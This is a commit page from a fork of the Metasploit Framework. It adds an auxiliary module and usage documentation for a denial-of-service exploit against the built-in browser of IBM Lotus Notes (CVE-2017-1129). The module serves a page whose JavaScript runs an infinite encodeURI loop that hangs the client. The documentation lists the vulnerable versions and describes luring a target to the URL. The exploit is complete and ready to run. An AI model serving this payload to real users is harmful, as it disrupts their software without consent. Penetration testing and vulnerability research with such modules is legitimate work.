dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #8989, IBM Lotus Notes DoS (CVE-2017-1129)

This commit is contained in:
Pearce Barry 2017-10-09 19:37:59 -05:00
parent 436b72d4cc fd8b72ca66
commit a3d47ea838
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
2 changed files with 122 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md Normal file
View File

@ -0,0 +1,63 @@
## Vulnerable Application
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
JavaScript is used to create an object instance of encode URI within an infinite loop,
leading to a Denial of Service of the IBM Lotus Notes app itself.
Vulnerable app versions include:
* IBM Notes 9.0.1 to 9.0.1 FP8IF1
* IBM Notes 9.0 to 9.0 IF4.
* IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
* IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
* IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
* IBM Notes 8.5 release
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
## Verification
1. Start msfconsole
1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
1. Set `SRVHOST`
1. Set `SRVPORT`
1. run (Server started)
1. Visit server URL in the built-in web-browser of IBM Notes client application
## Scenarios
```
msf > use auxiliary/dos/http/ibm_lotus_notes
msf auxiliary(ibm_lotus_notes) > show options
Module options (auxiliary/dos/http/ibm_lotus_notes):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer
msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes) >
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
[*] Server started.
msf auxiliary(ibm_lotus_notes) >
```
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.

59
modules/auxiliary/dos/http/ibm_lotus_notes.rb Normal file
View File

@ -0,0 +1,59 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes encodeURI DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
If successful, it could cause the Notes client to hang and have to be restarted.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
[ 'EXPLOIT-DB', '42602'],
[ 'CVE', '2017-1129' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
var object = { };
function d(d0) {
var d0 = (object instanceof encodeURI)('foo');
}
d(75);
} catch (d) { }
</script>
</head></html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end